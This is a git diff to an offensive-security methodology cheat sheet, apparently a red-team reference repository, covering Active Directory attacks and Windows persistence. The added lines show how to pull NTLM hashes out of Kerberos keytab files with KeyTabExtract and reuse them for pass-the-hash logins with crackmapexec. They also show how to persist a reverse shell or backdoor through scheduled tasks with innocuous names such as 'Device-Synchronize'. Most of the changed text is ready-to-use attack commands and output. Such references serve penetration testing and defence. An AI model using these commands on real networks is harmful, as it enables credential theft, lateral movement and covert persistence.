diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index d5265e6..f8f911b 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -1779,11 +1779,22 @@ $ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab [26] Service principal: host/COMPUTER@DOMAIN KVNO: 25 Key type: 23 - Key: 6b3723410a3c54692e400a5862256e0a + Key: 31d6cfe0d16ae931b73c59d7e0c089c0 Time stamp: Oct 07, 2019 09:12:02 [...] ``` +On Linux you can use [`KeyTabExtract`](https://github.com/sosdave/KeyTabExtract): we want RC4 HMAC hash to reuse the NLTM hash. + +```powershell +$ python3 keytabextract.py krb5.keytab +[!] No RC4-HMAC located. Unable to extract NTLM hashes. # No luck +[+] Keytab File successfully imported. + REALM : DOMAIN + SERVICE PRINCIPAL : host/computer.domain + NTLM HASH : 31d6cfe0d16ae931b73c59d7e0c089c0 # Lucky +``` + On macOS you can use `bifrost`. ```powershell @@ -1793,13 +1804,10 @@ On macOS you can use `bifrost`. Connect to the machine using the account and the hash with CME. ```powershell -$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "6b3723410a3c54692e400a5862256e0a" -d "DOMAIN" -CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c54692e400a5862256e0a +$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN" +CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0 ``` - - - ## References * [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index da207ba..d865beb 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -102,6 +102,17 @@ SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" - ### Scheduled Tasks User +Using native **schtask** + +```powershell +# Create the scheduled tasks to run once at 00.00 +schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe +# Force run it now ! +schtasks /run /tn "Device-Synchronize" +``` + +Using Powershell + ```powershell PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"